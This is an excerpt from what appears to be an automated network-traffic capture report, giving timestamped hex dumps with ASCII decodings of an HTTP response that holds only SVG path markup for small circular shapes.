2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                                                                                                        Data Ascii: s="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M879,279a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.5
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1567INData Raw: 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c 31 38 31 2e 31 38 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30
                                                                                                                                                                                                                                                        Data Ascii: 0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,181.18a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1583INData Raw: 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70
                                                                                                                                                                                                                                                        Data Ascii: -3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><p
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1599INData Raw: 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 34 34 2c 33 30 30 2e 30 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37
                                                                                                                                                                                                                                                        Data Ascii: 0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.44,300.07a1.7,1.7,0,0,1,.77-2.2,2.47
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1615INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 36 39 2c 32 31 32 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                        Data Ascii: cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.69,212.24a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1631INData Raw: 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 37 2e 31 36 2c 31 33 31 2e 32 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34
                                                                                                                                                                                                                                                        Data Ascii: .08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M977.16,131.24a1.7,1.7,0,0,1,.77-2.2,2.4
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1647INData Raw: 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                        Data Ascii: -.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1663INData Raw: 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                        Data Ascii: ,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1679INData Raw: 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: 2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1695INData Raw: 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 36 36 2c 31 38 32 2e 33 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c
                                                                                                                                                                                                                                                        Data Ascii: M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M881.66,182.33a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1711INData Raw: 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 35 34 2c 32 39 32 2e 32 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33
                                                                                                                                                                                                                                                        Data Ascii: </path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M864.54,292.28a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1727INData Raw: 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 34 2c 32 31 31 2e 32 38 61 31 2e 37 2c 31 2e 37 2c
                                                                                                                                                                                                                                                        Data Ascii: 0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M834,211.28a1.7,1.7,
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1743INData Raw: 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38
                                                                                                                                                                                                                                                        Data Ascii: 0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M8
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1759INData Raw: 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                        Data Ascii: 9.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"></path><path
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1775INData Raw: 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 31 2e 37 31 2c 32 35 39 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: h class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M521.71,259.58a1.91,1.91,0,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1792INData Raw: 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                        Data Ascii: 2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path c
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1808INData Raw: 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 33 33 2c 32 35 30 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                        Data Ascii: 8,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M576.33,250a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1
                                                                                                                                                                                                                                                        2023-10-09 13:51:00 UTC1824INData Raw: 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
